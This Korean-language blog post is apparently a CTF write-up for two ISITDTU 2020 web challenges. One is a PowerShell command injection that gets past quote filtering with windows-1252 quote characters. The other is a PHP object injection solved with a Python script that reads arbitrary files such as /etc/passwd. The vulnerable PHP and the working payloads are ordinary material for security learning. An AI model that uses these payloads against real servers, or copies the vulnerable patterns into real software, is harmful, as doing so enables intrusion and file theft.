---
layout: post
date: 2020-10-14 00:00:11
title: "ISITDTU CTF 2020 Write Up"
categories: CTF
tags: [Command Injection, PHP Object Injection]
author:
  - Jeongwon Jo

---
## (Web) Unexploitable [984 pts]

> Unexploitable 문제는 Command Injection 문제입니다. 

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbBTsc9%2FbtqKTFXChn9%2FwZaECUxbarmKUIG078oke1%2Fimg.png)

문제로 들어오면 위처럼 Debug 모드로 들어갈 수 있는 링크가 존재합니다.

```php
<?php

include "config.php";
set_time_limit(1);
if (isset($_GET['debug']))
{
    show_source(__FILE__);
}

if (isset($_GET['host']) && !empty($_GET['host']))
{
    $host = $_GET['host'];

    $host = remove_quot($host);
    
    $san_host = escapeshellcmd($host);
    
    system("powershell -Command ping -n 1 '$san_host'");

}

?>

<a href="?debug">Debug</a> Debug
```
그래서 일단 Debug 모드로 들어오니 PHP 코드가 보이는 것을 볼 수 있습니다. 코드를 보면 host 값을 가져와서 remove_quot() 함수를 이용해서 모든 쿼터들을 제거하고, escapeshellcmd() 함수를 이용해서 특수 문자 앞에 슬래쉬를 붙여 $san_host 변수에 넣어주는 것을 볼 수 있습니다.

그리고 마지막으로 system() 함수를 실행시키는 데 이때 저희가 입력한 값이 들어가는 것을 볼 수 있습니다. 여기서 저는 `Command Injection` 문제라고 생각했습니다.

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxgfaO%2FbtqKRNWmmGI%2FMKWWaBxMOhVtTCDK8dSNk0%2Fimg.png)

하지만 필터링에 의해서 싱글 쿼터를 사용할 수 없기 때문에 ping 명령어를 탈출할 수 없었습니다. 그러다가 우연히 문제 `Domain`만 치고 들어가니 해당 서버가 `windows server`인 `iis`를 사용하고 있는 것을 알 수 있었습니다.

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FArYWb%2FbtqKOB3u5Fo%2FsKRkzkc5MkgB09kZex9DgK%2Fimg.png)

그래서 윈도우 서버 특수 문자를 키워드로 검색을 해보니 `windows-1252` 방식으로 이루어진 특수 문자가 존재하는 것을 볼 수 있었습니다. 위 사진을 보시면 82, 91, 92는 싱글 쿼터를 대체할 수 있는 거 같고, 84, 93, 94는 더블 쿼터를 대체할 수 있는 거 같습니다.

한 번 이를 이용해서 ping 명령어를 탈출해서 다른 명령어를 실행시켜보겠습니다.

```
powershell -Command ping -n 1 '141.164.55.161'; ls ''
```
위와 같이 만들어주면 ping 명령어가 실행되고 나서 ls 명령어가 실행이 될 것입니다.

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb8aQeq%2FbtqKShpoFPE%2FAbj0m62SOGD6Nrk3ZwiOhK%2Fimg.png)

저는 82, 91, 92 중에서 92를 사용해서 싱글 쿼터를 대체하고, 이를 이용해서 ls 명령어를 실행해보니 config.php, flag.php, index.php 파일이 존재하는 것을 알 수 있었습니다.

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbxipKP%2FbtqKMz6dIb7%2FoTfMTrk2YXcfBYQMScrgc1%2Fimg.png)

마지막으로 cat 명령어를 이용해서 `flag.php` 파일을 읽어보니 FLAG가 들어있는 것을 볼 수 있었습니다. 이번 문제를 풀면서 처음으로 IIS 서버에서 싱글 쿼터를 우회하는 방법을 알게 되었고, windows-1252 인코딩 방식이 있다는 것도 알 수 있었습니다.

> FLAG : ISITDTU{6d77c41b70c235d1b077ad65e274a3c948bf56eb}

---
## (Web) Warmup [XXX pts]

> Warmup 문제는 간단한 PHP Object Injection 였는데 엄청난 실수로 풀지 못 했습니다.

```php
<?php
class Read{
    public $flag;
    public function __wakeup(){
        echo file_get_contents($this->flag);
    }
}
if(isset($_GET['username'])){
    if(isset($_GET['password']))
    {
        $password = $_GET['password'];
        unserialize($password);
    }
}
highlight_file(__FILE__);
?>
```
해당 문제로 들어오게 되면 위와 같은 PHP 코드가 보이는 것을 볼 수 있습니다. 일단 입력값을 `unserialize()` 메서드를 이용해서 역직렬화를 해주는 것을 보아  `PHP Object Injection`이라고 생각이 들었습니다. 하지만 `__wakeup()` 함수를 처음 보아서 이와 관련해서 조금 검색을 해보았습니다. 

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcqno3T%2FbtqKTG3qpro%2FjncPfrlLytMkGCkoyKjuWk%2Fimg.png)

검색을 해보니 `__wakeup()` 함수가 사용된 문제들이 많이 출제됐던 거 같습니다. 저만 이번에 처음 보는 거군요. 여하튼 위를 이용해서 `PHP Object Injection` 공격을 시도했습니다. 

```python
import requests

while(1):
	path = input("File Nmae : ")
	if path == '0':
		break
	path_len = len(path)
	url = 'http://35.220.140.18:5000/?username=&password=O:4:"Read":1:{s:4:"flag";s:' + str(path_len) + ':"' + path  +'";}'
	res = requests.get(url)
	print(res.text)
```
위와 같이 익스플로잇 코드를 작성해서 `/etc/passwd`, 아파치 설정 파일과 같은 것들을 모두 뒤져보았지만 결국 플래그를 획득하지 못 했습니다.

그러다가 오늘 오후 12시 45분쯤에 갑자기 생각이 나서 아는 분께 여쭤보니. robots.txt 파일에 플래그 파일이 있다고 하셨습니다. 너무 허무했습니다.

![](https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdneNEx%2FbtqKROgS2KF%2FPCkQfbI9xsTU4Nxo1k1knK%2Fimg.png)

그래서 robots.txt 파일을 확인해 보니 `fl4g.php` 파일인 것을 알 수 있었습니다 :( fl4g.php 파일을 릭해 플래그를 획득할 수 있었습니다.

> FLAG : ISITDTU{4re_y0u_w4rm?}

---
